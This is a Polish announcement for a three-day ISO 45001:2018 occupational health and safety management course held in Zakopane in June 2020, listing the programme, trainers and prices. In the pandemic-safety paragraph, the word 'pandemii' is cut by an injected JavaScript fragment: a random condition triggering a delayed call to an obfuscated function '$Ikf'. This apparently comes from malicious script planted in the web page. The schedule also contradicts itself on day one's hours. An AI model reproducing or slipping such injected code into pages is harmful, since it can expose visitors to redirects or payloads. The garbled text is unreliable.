PN-ISO 45001:2018 – Systemy Zarządzania Bezpieczeństwem i Higieną Pracy – interpretacja wymagań oraz ich praktyczne wdrożenie.


Szkolenie realizowane z zachowaniem wszelkich zasad bezpieczeństwa wymaganych w okresie pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andemii. Noclegi będą odbywać się w pokojach 1-osobowych, a zajęcia będą realizowane w sali umożliwiającej zachowanie odpowiednich odstępów między uczestnikami. Wszystkim uczestnikom zapewniamy maseczki i przyłbice ochronne.


Celem szkolenia jest zapoznanie uczestników z wymaganiami nowej normy PN-ISO 45001:2018 Systemy Zarządzania Bezpieczeństwem i Higieną Pracy i jej wdrażaniem. Praktycznym podejściem do interpretacji elementów systemu zarządzania wg ww. normy oraz porównaniu z wymaganiami norm OHSAS 18001:2007 i PN-N 18001:2004.


Szkolenie przeznaczone jest dla firm przemysłowych i innych organizacji, zainteresowanych wdrożeniem lub doskonaleniem swoich metod zarządzania bezpieczeństwem i higieną pracy w oparciu o wymagania normy PN-ISO 45001:2018.  Szkolenie kierowanie jest do: pełnomocników / koordynatorów i auditorów systemów zarządzania, pracodawców i osób zarządzających przedsiębiorstwami, pracowników służb BHP, doradców i konsultantów w zakresie systemu zarządzania BHP


Dzień I – Godziny szkolenia: 10.00-17.00

Dzień pierwszy

godz. 12.00 – 15.00 – Rejestracja Uczestników szkolenia oraz obiad

Moduł I godz. 15.00 – 18.00

 1. Okres przejściowy dla norm OHSAS 18001:2007 oraz PN-N-18001:2004
 2. Struktura SZBiHP według nowej normy PN-ISO 45001:2018 z uwzględnieniem Aneksu A
 3. Podstawowe terminy i definicje systemu zarządzania BHP wg PN-ISO 45001:2018
 4. Proces BHP – wymagania i dokumentowanie

Dzień drugi

Moduł II godz. 09.00-14.00

 1. Wymagania i interpretacja nowej normy PN-ISO 45001:2018:
  • określenie czynników wewnętrznych i zewnętrznych
  • określenie zainteresowanych stron wewnętrznych
  • określenie, ocena i wdrożenie ryzyk i szans oraz działań z nich wynikających
  • role w organizacji
  • udział i konsultacje pracowników
  • planowanie sterowania operacyjnego
  • outsourcing, zakupy, wykonawcy
  • monitorowanie, pomiary, analizy i oceny
  • weryfikacja udokumentowanych informacji
  • wytyczne prowadzenia auditów
  • proces ciągłego doskonalenia

Dzień trzeci

Moduł III godz.  09.00-13.00

 1. Praktyczne wdrożenie normy PN-ISO 45001:2018 – przykłady
  • Migracja wymagań systemu zarządzania BHP wg OHSAS 18001:2007 do normy PN-ISO 45001:2018
  • Migracja wymagań systemu zarządzania BHP wg PN-N 18001:2004 do normy PN-ISO 45001:2018
  • Określenie luk funkcjonującego systemu zarządzania BHP wg OHSAS 18001:2007 oraz PN-N 18001:2004 w zakresie spełnienia wymagań normy PN-ISO 45001:2018
  • Wnioski i podsumowanie warsztatów szkoleniowych

Trenerzy

Andrzej Kowalkow

 • Członek Komitetu Technicznego nr 276 ds.  Systemów Zarządzania Bezpieczeństwem i Higieną Pracy w zakresie normy PN-ISO 45001:2018, przy Polskim Komitecie Normalizacyjnym w Warszawie
 • Prezes Stowarzyszenia Polskie Forum Zarządzania Bezpieczeństwem i Higieną Pracy ISO  45000
 • Auditor wiodący jednostki certyfikacyjnej BVC
 • Wykładowca w dziedzinie zarządzania bezpieczeństwem i higieną pracy ( min.):
  • Polskim Centrum Badań i Certyfikacji w Warszawie – cykliczne szkolenia dla auditorów i osób wdrażających SZBiHP
  • Centralnym Instytucie Ochrony Pracy Państwowym Instytucie Badawczym w Warszawie – szkolenia w zakresie wdrażania i doskonalenia SZBiHP

Dariusz Okraska

 • Członek Komitetu Technicznego nr 276 ds.  Systemów Zarządzania Bezpieczeństwem i Higieną Pracy w zakresie normy PN-ISO 45001:2018, przy Polskim Komitecie Normalizacyjnym w Warszawie
 • Wiceprezesa Stowarzyszenia Polskie Forum Zarządzania Bezpieczeństwem i Higieną Pracy ISO 45000;
 • Auditora jednostki certyfikacyjnej
 • Członek Zarządu Ogólnopolskiego Stowarzyszenia Pracowników Służby BHP – Oddział Częstochowa
 • Wykładowca w dziedzinie zarządzania bezpieczeństwem i higieną pracy ( min.):
  • Polskim Centrum Badań i Certyfikacji w Warszawie – cykliczne szkolenia dla auditorów i osób wdrażających SZBiHP

Daty i miejsca szkolenia

17-19.06.2020 – Zakopane
Ośrodek Konferencyjno-Wypoczynkowy „HYRNY” ul.Piłsudskiego 20, 34-500 Zakopane


Cena

1800 zł netto (Cena promocyjna 1700* zł netto)

* W przypadku zgłoszenia co najmniej 2 osób z tej samej organizacji oraz członkowie stowarzyszenia Forum ISO 14000, Forum ISO 9000 oraz OSPSBHP.

Dla Członków Zwyczajnych Stowarzyszenia Polskie Forum ISO 45000 obowiązuje cena niższa o 10%.

Dla Członków Wspierających Stowarzyszenia Polskie Forum ISO 45000 obowiązuje cena niższa o 20%.

Cena obejmuje:

 • udział w szkoleniu
 • materiały szkoleniowe
 • przerwy kawowe
 • wyżywienie
 • noclegi w pokojach 1-osobowych
 • zaświadczenie o ukończeniu szkolenia

Istnieje możliwość dodatkowej dopłaty:

Ośrodek Konferencyjno-Wypoczynkowy „HYRNY” ul.Piłsudskiego 20, 34-500 Zakopane

 • Dopłata do przyjazdu dzień wcześniej: 200 zł netto